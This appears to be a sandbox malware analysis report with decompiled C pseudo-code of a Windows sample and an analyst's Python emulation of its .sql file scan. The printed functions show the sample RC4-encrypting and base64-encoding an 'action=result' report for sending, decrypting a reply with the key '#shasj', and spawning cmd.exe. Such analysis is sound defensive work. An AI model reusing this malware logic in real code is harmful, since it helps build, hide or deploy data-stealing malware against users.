                                         0f9d6a7e  				_v8 = FindFirstFileW(_t66,  &_v620);
                                         0f9d6a83  				 *_t52 = 0;
                                         0f9d6a86  				_t53 = 0;
                                         0f9d6a90  				do {
                                         0f9d6aa0  					if(lstrcmpW( &(_v620.cFileName), ".") == 0 || lstrcmpW( &(_v620.cFileName), L"..") == 0) {
                                                   						goto L20;
                                         0f9d6abc  					} else {
                                         0f9d6ac4  						lstrcatW(_t66,  &(_v620.cFileName));
                                         0f9d6acb  						_t38 = lstrlenW(_t66);
                                         0f9d6ad1  						_t10 = _t38 - 1; // -1
                                         0f9d6ad4  						_t57 =  &(_t66[_t10]);
                                         0f9d6ad9  						if(_t38 == 0) {
                                         0f9d6ba8  							L18:
                                         0f9d6ba8  							_t53 = 0;
                                                   							goto L19;
                                         0f9d6ae0  						} else {
                                         0f9d6ae0  							while( *_t57 != 0x2e) {   /* walk back to the last '.' (0x2e) of the full path */
                                         0f9d6ae6  								_t57 = _t57 - 2;
                                         0f9d6ae9  								_t38 = _t38 - 1;
                                         0f9d6aea  								if(_t38 != 0) {
                                                   									continue;
                                                   								}
                                                   								break;
                                         0f9d6aea  							}
                                         0f9d6aee  							if(_t38 == 0) {   /* no '.' found: skip this entry */
                                                   								goto L18;
                                         0f9d6af4  							} else {
                                         0f9d6afa  								_t40 = lstrcmpW(_t57, L".sql");   /* exact, case-sensitive suffix compare */
                                         0f9d6afe  								if(_t40 != 0) {
                                                   									goto L18;
                                         0f9d6b04  								} else {
                                         0f9d6b17  									_t54 = CreateFileW(_t66, 0x80000000, 1, _t40, 3, _t40, _t40);   /* GENERIC_READ, FILE_SHARE_READ, OPEN_EXISTING */
                                         0f9d6b22  									_t64 = GetFileSize(_t54, 0);
                                         0f9d6b26  									_v12 = 0;
                                         0f9d6b2f  									if(_t64 < 0x40000000) {   /* only files below 1 GiB are read */
                                         0f9d6b40  										_t67 = VirtualAlloc(0, _t64, 0x3000, 4);   /* MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE */
                                         0f9d6b44  										if(_t67 != 0) {
                                         0f9d6b57  											if(ReadFile(_t54, _t67, _t64,  &_v24, 0) != 0 && E0F9D8100(_t67, "*******************") != 0) {
                                         0f9d6b6e  												_t50 = lstrlenA("*******************");   /* 19 */
                                         0f9d6b74  												_t15 = _t67 + 1; // 0x1
                                         0f9d6b7e  												_v12 = E0F9D69E0(_t15 + _t50);   /* parse from buf + 20, not from where the marker was found */
                                         0f9d6b7e  											}
                                         0f9d6b89  											VirtualFree(_t67, 0, 0x8000);
                                         0f9d6b89  										}
                                         0f9d6b8f  										_t66 = _v16;
                                         0f9d6b8f  									}
                                         0f9d6b93  									CloseHandle(_t54);
                                         0f9d6b99  									_t53 = _v12;
                                         0f9d6b9e  									if(_t53 == 0) {
                                         0f9d6baa  										L19:
                                         0f9d6baf  										 *_v20 = 0;   /* cut the file name off again, leaving the directory prefix */
                                                   										goto L20;
                                         0f9d6baf  									}
                                         0f9d6b9e  								}
                                         0f9d6afe  							}
                                         0f9d6aee  						}
                                         0f9d6ad9  					}
                                                   					break;   /* non-zero parser result: stop enumerating */
                                         0f9d6bb2  					L20:
                                         0f9d6bc2  				} while (FindNextFileW(_v8,  &_v620) != 0);
                                         0f9d6bcd  				FindClose(_v8);
                                         0f9d6bdb  				return _t53;
                                                   			}

                                        APIs
                                        • lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F9D6A52
                                        • lstrcatW.KERNEL32(00000000,0F9DFEC4), ref: 0F9D6A64
                                        • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F9D6A72
                                        • lstrcmpW.KERNEL32(?,0F9DFEC8,?,?), ref: 0F9D6A9C
                                        • lstrcmpW.KERNEL32(?,0F9DFECC,?,?), ref: 0F9D6AB2
                                        • lstrcatW.KERNEL32(00000000,?), ref: 0F9D6AC4
                                        • lstrlenW.KERNEL32(00000000,?,?), ref: 0F9D6ACB
                                        • lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0F9D6AFA
                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0F9D6B11
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0F9D6B1C
                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0F9D6B3A
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0F9D6B4F
                                        • lstrlenA.KERNEL32(*******************,?,?), ref: 0F9D6B6E
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F9D6B89
                                        • CloseHandle.KERNEL32(00000000,?,?), ref: 0F9D6B93
                                        • FindNextFileW.KERNEL32(?,?,?,?), ref: 0F9D6BBC
                                        • FindClose.KERNEL32(?,?,?), ref: 0F9D6BCD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                         • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                         • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Findlstrcmplstrlen$CloseVirtuallstrcat$AllocCreateFirstFreeHandleNextReadSize
                                        • String ID: *******************$.sql
                                        • API String ID: 3616287438-58436570
                                        • Opcode ID: 7acef97b6cf5bf908ecdaaa8ee129a3ebd2e9f96ac06adc6bed569c35bb26690
                                        • Instruction ID: db7127e1794116e3484887351a720f12dd837b5ffa9690e8d09b30950e54e4e8
                                        • Opcode Fuzzy Hash: 7acef97b6cf5bf908ecdaaa8ee129a3ebd2e9f96ac06adc6bed569c35bb26690
                                        • Instruction Fuzzy Hash: 4441A671606216ABEB209F64CC49FAE77ACEF45715F608055F502E3182DB78AA50CB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%
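The directory scan in E0F9D6A40 above, re-implemented in Python as an added example (this is not code from the report or from the sample; the function names, the fixture directory and its contents are the example's own). It reproduces the checks visible in the decompiled code (non-recursive listing, exact case-sensitive ".sql" suffix after the last '.' of the full path, 1 GiB size ceiling, 19-asterisk marker) and the fixed-offset quirk, so an analyst can see which files would be picked up and what bytes the parser would receive. What the real parser E0F9D69E0 does with those bytes is not on this page; here they are simply returned.

```python
import os
import tempfile

# Values taken from the decompiled E0F9D6A40; everything else is this example's own.
MARKER = b"*" * 19               # lstrlenA("*******************") == 19
SIZE_LIMIT = 0x40000000          # GetFileSize result must be below 1 GiB
PARSE_OFFSET = 1 + len(MARKER)   # E0F9D69E0(buf + 1 + lstrlenA(marker)) == buf + 20


def has_sql_suffix(path: str) -> bool:
    """Walk back from the end of the full path to the last '.', then compare the
    remainder with ".sql" exactly (the sample uses lstrcmpW, which is case-sensitive).
    A path without any '.' is skipped, and so are "x.SQL" and "x.sql.bak"."""
    dot = path.rfind(".")
    return dot >= 0 and path[dot:] == ".sql"


def extract_payload(path: str):
    """Return the bytes the sample would hand to its parser for one file, or None
    when the file would not be opened, read, or does not contain the marker."""
    if not has_sql_suffix(path) or not os.path.isfile(path):
        return None
    if os.path.getsize(path) >= SIZE_LIMIT:
        return None
    with open(path, "rb") as fh:
        data = fh.read()
    if MARKER not in data:
        return None
    # Quirk: the marker search result is only used as a boolean. Parsing starts at a
    # fixed offset of 20 from the start of the buffer, wherever the marker actually is.
    return data[PARSE_OFFSET:]


def find_sql_payload(directory: str):
    """Emulate the enumeration loop: the first file with a non-empty payload wins."""
    # FindFirstFileW/FindNextFileW return entries in filesystem order; sorted here for determinism.
    for name in sorted(os.listdir(directory)):
        payload = extract_payload(os.path.join(directory, name))
        if payload:
            return payload
    return None


def build_sample_dir() -> str:
    """Constructed fixture for this example (not from the report)."""
    d = tempfile.mkdtemp(prefix="gc_sql_")
    files = {
        "config.sql": MARKER + b"\n" + b"k=v",          # marker at offset 0: payload is b"k=v"
        "late.sql":   b"header\n" + MARKER + b"\nX",    # marker later: the fixed offset mangles it
        "dump.SQL":   MARKER + b"\nignored",            # wrong case: never opened
        "notes.txt":  MARKER + b"\nignored",            # wrong extension
        "empty.sql":  b"no marker here",                # marker absent
    }
    for name, content in files.items():
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(content)
    return d


if __name__ == "__main__":
    sample = build_sample_dir()
    print(find_sql_payload(sample))                              # b'k=v'
    print(extract_payload(os.path.join(sample, "late.sql")))    # b'******\nX'
```

The "late.sql" case is the one worth noticing: the marker is found, but because the parser is pointed at a fixed offset the bytes it receives start inside the marker itself. Any file the sample is meant to consume therefore has to begin with the marker.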

                                        C-Code - Quality: 51%
                                         			/* Builds and sends the "action=result" report. wsprintfW writes
                                         			   "action=result&e_files=%d&e_size=%I64u&e_time=%d&" into a 0x4C02-byte buffer; the helpers
                                         			   E0F9D39F0 / E0F9D7330 / E0F9D7140 / E0F9D6F40 (bodies not shown on this page) append further
                                         			   fields after it. A 256-byte state at _v436 is zeroed, keyed with the literal "#shasj"
                                         			   (E0F9D5D70) and applied to the UTF-16LE text, lstrlenW*2 bytes (E0F9D5E20); that
                                         			   init / key-schedule / apply pattern is consistent with RC4, but the helper bodies are not
                                         			   reproduced here. CryptBinaryToStringA with 0x40000001 = CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF
                                         			   encodes the ciphertext into the second half of the same allocation (+0x800); the loop near
                                         			   the end strips any remaining 0x0A/0x0D, so the result is single-line base64 even where
                                         			   NOCRLF is ignored. E0F9D54A0 is then called with the encoded string. The three "!= ? 1 : 0"
                                         			   lines are decompiler residue (quality 51%): the compared left operand was not recovered,
                                         			   so only the 1/0 shape of the return value is known. Left column: instruction address. */
                                                   			E0F9D5670(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                   				BYTE* _v8;
                                                   				void* _v12;
                                                   				void* _v16;
                                                   				int _v20;
                                                   				char _v22;
                                                   				short _v24;
                                                   				short _v28;
                                                   				char _v36;
                                                   				char _v180;
                                                   				char _v435;
                                                   				char _v436;
                                                   				WCHAR* _t40;
                                                   				signed int _t48;
                                                   				int _t60;
                                                   				void* _t61;
                                                   				char _t68;
                                                   				CHAR* _t71;
                                                   				void* _t74;
                                                   				short _t79;
                                                   				short _t80;
                                                   				char _t81;
                                                   				BYTE* _t84;
                                                   				WCHAR* _t92;
                                                   				signed int _t93;
                                                   				char* _t95;
                                                   				void* _t96;
                                                   				int _t98;
                                                   				long _t99;
                                                   				void* _t100;
                                         
                                         0f9d5670  				_t88 = __edx;
                                         0f9d5670  				_t74 = __ecx;
                                         0f9d568a  				_t96 = __edx;
                                         0f9d568c  				_v12 = __ecx;
                                         0f9d568f  				_t40 = VirtualAlloc(0, 0x4c02, 0x3000, 0x40);   /* MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE */
                                         0f9d5695  				_v16 = _t40;
                                         0f9d569a  				if(_t40 == 0) {
                                         0f9d56a6  					_t92 = 0;
                                         0f9d56a8  					_t71 = 0;
                                         0f9d569c  				} else {
                                         0f9d569c  					_t3 =  &(_t40[0x400]); // 0x800
                                         0f9d569c  					_t71 = _t3;   /* _t71: base64 output area, byte offset 0x800 into the same allocation */
                                         0f9d56a2  					_t92 = _t40;  /* _t92: wide-char request buffer */
                                         0f9d56a2  				}
                                         0f9d56aa  				_push(_t96);
                                         0f9d56ae  				_v8 = _t92;
                                         0f9d56bd  				wsprintfW(_t92, L"action=result&e_files=%d&e_size=%I64u&e_time=%d&", _v12, _a4, _a8);
                                         0f9d56c6  				_push(0);
                                         0f9d56c8  				_push(_t74);
                                         0f9d56c9  				_push(0);
                                         0f9d56ce  				_push(0);
                                         0f9d56d0  				_push(_t74);
                                         0f9d56d1  				_push(0);
                                         0f9d56d3  				_push(_t74);
                                         0f9d56d4  				_push(0);
                                         0f9d56d6  				_push(_t74);
                                         0f9d56d7  				_push(0);
                                         0f9d56d9  				_push(_t74);
                                         0f9d56da  				_push(0);
                                         0f9d56df  				_push(0);
                                         0f9d56e1  				_push(_t74);
                                         0f9d56e2  				_push(0);
                                         0f9d56ea  				E0F9D39F0( &_v180);
                                         0f9d56f5  				E0F9D7330( &_v180, _t88);
                                         0f9d5700  				E0F9D7140( &_v180);
                                         0f9d5718  				E0F9D6F40( &_v180,  &(_t92[lstrlenW(_t92)]));   /* appends to the end of the formatted text */
                                         0f9d571e  				_t48 = lstrlenW(_t92);
                                         0f9d5720  				_t79 = "#shasj"; // 0x61687323
                                         0f9d5726  				_t93 = _t48;   /* _t93: length of the text in WCHARs */
                                         0f9d5728  				asm("movq xmm0, [0xf9dfc78]");
                                         0f9d5736  				_v28 = _t79;   /* the key string passed to E0F9D5D70 is assembled on the stack from the literal "#shasj" */
                                         0f9d5739  				_t80 =  *0xf9dfc84; // 0x6a73
                                         0f9d5745  				_v24 = _t80;
                                         0f9d5749  				_t81 =  *0xf9dfc86; // 0x0
                                         0f9d5752  				asm("movq [ebp-0x20], xmm0");
                                         0f9d5757  				_v22 = _t81;
                                         0f9d575a  				_v436 = 0;
                                         0f9d5761  				E0F9D9010( &_v435, 0, 0xff);   /* memset: clears the remaining 255 bytes of the 256-byte state */
                                         0f9d577d  				E0F9D5D70( &_v436,  &_v36, lstrlenA( &_v36));   /* key schedule over the state with the "#shasj" key */
                                         0f9d5785  				_t98 = _t93 + _t93;   /* byte length of the UTF-16LE text, terminator excluded */
                                         0f9d5792  				E0F9D5E20( &_v436, _v8, _t98);   /* apply the keystream to the request buffer in place */
                                         0f9d57a1  				_v20 = _t93 * 8;   /* output capacity handed to CryptBinaryToStringA */
                                         0f9d57ba  				if(CryptBinaryToStringA(_v8, _t98, 0x40000001, _t71,  &_v20) == 0) {   /* CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF */
                                         0f9d57bc  					GetLastError();
                                         0f9d57bc  				}
                                         0f9d57d2  				_t29 = lstrlenA(_t71) + 4; // 0x4
                                         0f9d57d2  				_t99 = _t29;
                                         0f9d57df  				_v12 = VirtualAlloc(0, _t99, 0x3000, 0x40);
                                         0f9d57e2  				_t60 = lstrlenA(_t71);
                                         0f9d57e4  				_t84 = _v12;
                                         0f9d57e7  				_t61 = _t60 + 2;
                                         0f9d57ec  				if(_t84 == 0) {
                                         0f9d57f5  					L7:
                                         0f9d57f5  					_v8 = 0;
                                         0f9d57ee  				} else {
                                         0f9d57ee  					_v8 = _t84;
                                         0f9d57f3  					if(_t61 >= _t99) {   /* len+2 >= len+4 never holds; L7 is reached only on allocation failure */
                                                   						goto L7;
                                                   					}
                                         0f9d57f3  				}
                                         0f9d57fd  				_t100 = 0;
                                         0f9d5803  				if(lstrlenA(_t71) != 0) {
                                         0f9d5805  					_t95 = _v8;
                                         0f9d5808  					do {   /* copy the base64 text, dropping LF (0x0a) and CR (0x0d) */
                                         0f9d5808  						_t68 =  *((intOrPtr*)(_t100 + _t71));
                                         0f9d580d  						if(_t68 != 0xa && _t68 != 0xd) {
                                         0f9d5813  							 *_t95 = _t68;
                                         0f9d5815  							_t95 = _t95 + 1;
                                         0f9d5815  						}
                                         0f9d5817  						_t100 = _t100 + 1;
                                         0f9d581e  					} while (_t100 < lstrlenA(_t71));
                                         0f9d5808  				}
                                         0f9d5829  				E0F9D54A0(_v8, 0, 0);   /* send the encoded request */
                                         0f9d5843  				_t73 =  !=  ? 1 : 0;   /* left operand not recovered by the decompiler */
                                         0f9d5850  				VirtualFree(_v12, 0, 0x8000);
                                         0f9d5858  				E0F9D7C10( &_v180);
                                         0f9d5867  				VirtualFree(_v16, 0, 0x8000);
                                         0f9d586b  				_t67 =  !=  ? 1 : 0;
                                         0f9d5871  				return  !=  ? 1 : 0;
                                                   			}

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00004C02,00003000,00000040,?,00000000,?), ref: 0F9D568F
                                        • wsprintfW.USER32 ref: 0F9D56BD
                                        • lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0F9D570C
                                        • lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0F9D571E
                                        • _memset.LIBCMT ref: 0F9D5761
                                        • lstrlenA.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 0F9D576D
                                        • CryptBinaryToStringA.CRYPT32(?,74CB69A0,40000001,00000000,00000000), ref: 0F9D57B2
                                        • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,00000000), ref: 0F9D57BC
                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0F9D57C9
                                        • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000040,?,?,?,?,00000000,00000000,?,00000000), ref: 0F9D57D8
                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0F9D57E2
                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0F9D57FF
                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0F9D5818
                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 0F9D5850
                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 0F9D5867
                                        Strings
                                        • #shasj, xrefs: 0F9D5720
                                        • action=result&e_files=%d&e_size=%I64u&e_time=%d&, xrefs: 0F9D56B7
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                         • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                         • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Virtual$AllocFree$BinaryCryptErrorLastString_memsetwsprintf
                                        • String ID: #shasj$action=result&e_files=%d&e_size=%I64u&e_time=%d&
                                        • API String ID: 2994799111-4131875188
                                        • Opcode ID: b97c54c66967e5881f31c2355ab5d60a25196413129584c32ae6a99e7494c735
                                        • Instruction ID: 4b3846844843bca3adad47a4416aa51267287b95fb9ecbd376b45b9ad7cf64d3
                                        • Opcode Fuzzy Hash: b97c54c66967e5881f31c2355ab5d60a25196413129584c32ae6a99e7494c735
                                        • Instruction Fuzzy Hash: 0F51E171904219ABEB20EBA4DC45FEEBB7DEF44300F644064FA05A71C2EB746A54CBA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 73%
                                        			E0F9D5210(CHAR* __ecx, CHAR** __edx) {
                                        				int _v8;
                                        				long _v12;
                                        				char _v14;
                                        				void* _v16;
                                        				void* _v20;
                                        				void* _v24;
                                        				char _v28;
                                        				CHAR** _v32;
                                        				void* _v36;
                                        				char _v291;
                                        				char _v292;
                                        				void* _v348;
                                        				void* _v352;
                                        				int _t43;
                                        				BYTE* _t44;
                                        				int _t46;
                                        				void* _t50;
                                        				void* _t51;
                                        				char _t52;
                                        				void* _t64;
                                        				signed int _t66;
                                        				signed int _t68;
                                        				int _t69;
                                        				int _t72;
                                        				char _t74;
                                        				intOrPtr _t75;
                                        				CHAR* _t84;
                                        				char* _t86;
                                        				void* _t88;
                                        				signed char _t89;
                                        				WCHAR* _t94;
                                        				CHAR* _t95;
                                        				BYTE* _t101;
                                        				WCHAR* _t102;
                                        				WCHAR* _t103;
                                        				void* _t104;
                                        				long _t105;
                                        				long _t106;
                                        				int _t107;
                                        				void* _t108;
                                        				CHAR* _t109;
                                        				void* _t110;
                                        
                                        				_t86 = __ecx;
                                        				_v32 = __edx;
                                        				_t43 = lstrlenA(__ecx) + 1;
                                        				_v8 = _t43;
                                        				_t3 = _t43 + 1; // 0x2
                                        				_t105 = _t3;
                                        				_t44 = VirtualAlloc(0, _t105, 0x3000, 0x40);
                                        				_v36 = _t44;
                                        				if(_t44 == 0 || _v8 >= _t105) {
                                        					_t101 = 0;
                                        					__eflags = 0;
                                        				} else {
                                        					_t101 = _t44;
                                        				}
                                        				_t106 = 0;
                                        				_t46 = CryptStringToBinaryA(_t86, 0, 1, _t101,  &_v8, 0, 0);
                                        				_t119 = _t46;
                                        				if(_t46 == 0) {
                                        					GetLastError();
                                        					goto L14;
                                        				} else {
                                        					_t50 = "#shasj"; // 0x61687323
                                        					asm("movq xmm0, [0xf9dfc78]");
                                        					_t107 = _v8;
                                        					_v20 = _t50;
                                        					_t51 =  *0xf9dfc84; // 0x6a73
                                        					_v16 = _t51;
                                        					_t52 =  *0xf9dfc86; // 0x0
                                        					_v14 = _t52;
                                        					asm("movq [ebp-0x18], xmm0");
                                        					_v292 = 0;
                                        					E0F9D9010( &_v291, 0, 0xff);
                                        					E0F9D5D70( &_v292,  &_v28, lstrlenA( &_v28));
                                        					E0F9D5E20( &_v292, _t101, _t107);
                                        					_t94 =  &_v28;
                                        					asm("xorps xmm0, xmm0");
                                        					asm("movdqu [ebp-0x18], xmm0");
                                        					E0F9D33E0(_t94, _t119, _t101);
                                        					if(_v28 != 0) {
                                        						E0F9D5190();
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						_push(lstrlenA);
                                        						_push(_t107);
                                        						_push(_t101);
                                        						_t102 = _t94;
                                        						_t108 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
                                        						_v352 = _t108;
                                        						GetModuleFileNameW(0, _t108, 0x200);
                                        						_t88 = CreateFileW(_t108, 0x80000000, 1, 0, 3, 0x80, 0);
                                        						_v348 = _t88;
                                        						__eflags = _t88 - 0xffffffff;
                                        						if(_t88 != 0xffffffff) {
                                        							_t64 = CreateFileMappingW(_t88, 0, 8, 0, 0, 0);
                                        							_v28 = _t64;
                                        							__eflags = _t64;
                                        							if(_t64 != 0) {
                                        								_t66 = MapViewOfFile(_t64, 1, 0, 0, 0);
                                        								_v16 = _t66;
                                        								__eflags = _t66;
                                        								if(_t66 != 0) {
                                        									_t29 = _t66 + 0x4e; // 0x4e
                                        									_t109 = _t29;
                                        									_v12 = _t109;
                                        									_t68 = lstrlenW(_t102);
                                        									_t89 = 0;
                                        									_t103 =  &(_t102[_t68]);
                                        									_t69 = lstrlenA(_t109);
                                        									__eflags = _t69 + _t69;
                                        									if(_t69 + _t69 != 0) {
                                        										_t95 = _t109;
                                        										do {
                                        											__eflags = _t89 & 0x00000001;
                                        											if((_t89 & 0x00000001) != 0) {
                                        												 *((char*)(_t103 + _t89)) = 0;
                                        											} else {
                                        												_t74 =  *_t109;
                                        												_t109 =  &(_t109[1]);
                                        												 *((char*)(_t103 + _t89)) = _t74;
                                        											}
                                        											_t89 = _t89 + 1;
                                        											_t72 = lstrlenA(_t95);
                                        											_t95 = _v12;
                                        											__eflags = _t89 - _t72 + _t72;
                                        										} while (_t89 < _t72 + _t72);
                                        									}
                                        									UnmapViewOfFile(_v16);
                                        									_t88 = _v20;
                                        									_t108 = _v24;
                                        								}
                                        								CloseHandle(_v28);
                                        							}
                                        							CloseHandle(_t88);
                                        						}
                                        						return VirtualFree(_t108, 0, 0x8000);
                                        					} else {
                                        						_t104 = _v24;
                                        						_t75 =  *0xf9e2a60; // 0x0
                                        						_t110 = _v20;
                                        						_t76 =  !=  ? 0 : _t75;
                                        						_v12 = 1;
                                        						 *0xf9e2a60 =  !=  ? 0 : _t75;
                                        						if(_t110 != 0) {
                                        							_t84 = VirtualAlloc(0, lstrlenA(_t110) + 1, 0x3000, 4);
                                        							 *_v32 = _t84;
                                        							if(_t84 != 0) {
                                        								lstrcpyA(_t84, _t110);
                                        							}
                                        						}
                                        						_t77 = GetProcessHeap;
                                        						if(_t104 != 0) {
                                        							HeapFree(GetProcessHeap(), 0, _t104);
                                        							_t77 = GetProcessHeap;
                                        						}
                                        						if(_t110 != 0) {
                                        							HeapFree( *_t77(), 0, _t110);
                                        						}
                                        						_t106 = _v12;
                                        						L14:
                                        						VirtualFree(_v36, 0, 0x8000);
                                        						return _t106;
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • lstrlenA.KERNEL32(?,00000001,?,?), ref: 0F9D5222
                                        • VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 0F9D5239
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0F9D525E
                                        • _memset.LIBCMT ref: 0F9D52AB
                                        • lstrlenA.KERNEL32(?), ref: 0F9D52BD
                                        • lstrlenA.KERNEL32(?,00003000,00000004,00000000), ref: 0F9D5324
                                        • VirtualAlloc.KERNEL32(00000000,00000001), ref: 0F9D532A
                                        • lstrcpyA.KERNEL32(00000000,?), ref: 0F9D533B
                                        • HeapFree.KERNEL32(00000000), ref: 0F9D5356
                                        • HeapFree.KERNEL32(00000000), ref: 0F9D5367
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D5376
                                        • GetLastError.KERNEL32 ref: 0F9D5385
                                          • Part of subcall function 0F9D5190: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,00000000,0F9D5392,00000000), ref: 0F9D51A6
                                          • Part of subcall function 0F9D5190: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F9D51B8
                                          • Part of subcall function 0F9D5190: GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 0F9D51C8
                                          • Part of subcall function 0F9D5190: wsprintfW.USER32 ref: 0F9D51D9
                                          • Part of subcall function 0F9D5190: ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0F9D51F3
                                          • Part of subcall function 0F9D5190: ExitProcess.KERNEL32 ref: 0F9D51FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$Alloc$Freelstrlen$Heap$BinaryCryptErrorExecuteExitFileLastModuleNameProcessShellString_memsetlstrcpywsprintf
                                        • String ID: #shasj
                                        • API String ID: 834684195-2423951532
                                        • Opcode ID: cfa8315b72d8639660257b935eb3bcbf1aad53b2cf44e388a7e2ab260f820f3e
                                        • Instruction ID: cd4991fc8194d4aa471413fed75ff32b5195dccf4f5fbfb1cdcb4ee1be2f606e
                                        • Opcode Fuzzy Hash: cfa8315b72d8639660257b935eb3bcbf1aad53b2cf44e388a7e2ab260f820f3e
                                        • Instruction Fuzzy Hash: 5B41F631A05215ABEB209BA4DC44BEFBB7CEF49711F244114F905E3282DB789950CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 66%
                                        			E0F9D8150(intOrPtr __ecx, void* __edx) {
                                        				long* _v8;
                                        				intOrPtr _v12;
                                        				signed int _v16;
                                        				char _v20;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				char _v32;
                                        				char _v34;
                                        				short _v36;
                                        				intOrPtr _v40;
                                        				intOrPtr _v44;
                                        				char _v48;
                                        				long** _t37;
                                        				struct HINSTANCE__* _t45;
                                        				_Unknown_base(*)()* _t46;
                                        				signed int _t54;
                                        				long _t55;
                                        				intOrPtr _t56;
                                        				signed int _t58;
                                        				signed int _t60;
                                        				void* _t63;
                                        				void* _t64;
                                        				void* _t65;
                                        
                                        				_t54 = 0;
                                        				_v12 = __ecx;
                                        				_t37 =  &_v8;
                                        				_t63 = __edx;
                                        				__imp__CryptAcquireContextW(_t37, 0, 0, 1, 0xf0000000);
                                        				if(_t37 == 0) {
                                        					L15:
                                        					return _t54;
                                        				} else {
                                        					_t58 = 0;
                                        					do {
                                        						_t3 = _t58 + 0x61; // 0x61
                                        						 *((short*)(_t65 + _t58 * 2 - 0x64)) = _t3;
                                        						_t58 = _t58 + 1;
                                        					} while (_t58 < 0x1a);
                                        					_t7 = _t63 + 1; // 0x1
                                        					_t55 = _t7;
                                        					_t64 = VirtualAlloc(0, _t55, 0x3000, 0x40);
                                        					if(_t64 == 0 || _t63 >= _t55) {
                                        						CryptReleaseContext(_v8, 0);
                                        						VirtualFree(_t64, 0, 0x8000);
                                        						return 0;
                                        					} else {
                                        						_v48 = 0x70797243;
                                        						_v44 = 0x6e654774;
                                        						_v40 = 0x646e6152;
